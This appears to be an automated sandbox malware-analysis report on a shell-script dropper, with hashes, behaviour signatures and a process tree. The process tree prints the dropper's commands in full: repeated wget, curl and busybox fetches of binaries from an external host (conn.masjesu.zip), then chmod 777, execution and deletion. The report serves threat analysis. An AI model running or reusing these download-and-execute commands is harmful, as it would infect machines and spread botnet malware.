Analysis
-
max time kernel
90s -
max time network
119s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:20
Static task
static1
Behavioral task
behavioral1
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
-
Size
10KB
-
MD5
a5dec9cd68c75301d742f7bf9789c4f8
-
SHA1
24ee3d00677e483eae3654f0eab7a2a06e912288
-
SHA256
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
-
SHA512
0d552f2f17ef3eb821b94288c9fd717568161003de257fd488b93a41c02257759480e52b93d5d19fee1311a87d6b6136233520c17351af772d5b2ccc6311f9b4
-
SSDEEP
192:nXbslV5d8Mv+SUMyCP8okpm79NzTaBVpc8Mv+S2XbslV1yCP8okzvzTaBV2:nXbslV5d8Mv+SUMyCP8oom79Mc8Mv+SW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1017 chmod 762 chmod 885 chmod 900 chmod 930 chmod 966 chmod 742 chmod 817 chmod 959 chmod 907 chmod 987 chmod 994 chmod 1002 chmod 980 chmod 749 chmod 824 chmod 835 chmod 922 chmod 892 chmod 973 chmod 914 chmod 937 chmod 944 chmod 794 chmod 856 chmod 878 chmod 1010 chmod 952 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 743 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 750 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 764 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 795 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 818 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 825 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 837 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 858 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 879 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 886 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 893 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 901 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly 908 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 915 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 923 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 931 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 938 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 945 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 953 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 960 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 967 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 974 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 981 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 988 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 995 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 1003 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 1011 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly 1018 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 800 wget 941 curl 991 curl 748 busybox 770 wget 846 curl 933 wget 951 busybox 732 curl 745 wget 746 curl 1009 busybox 919 curl 949 curl 962 wget 753 curl 841 wget 852 busybox 965 busybox 1013 wget 828 curl 913 busybox 940 wget 948 wget 979 busybox 993 busybox 1001 busybox 717 wget 910 wget 934 curl 956 curl 963 curl 977 curl 809 curl 884 busybox 888 wget 833 busybox 999 curl 877 busybox 976 wget 1007 curl 911 curl 926 wget 943 busybox 984 curl 821 curl 896 wget 906 busybox 741 busybox 929 busybox 1014 curl 823 busybox 827 wget 881 wget 921 busybox 927 curl 757 busybox 779 curl 788 busybox 969 wget 972 busybox 983 wget 918 wget 970 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl
Processes
-
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:799
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:816
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:823
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:891
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:899
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:936
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:951
-
-
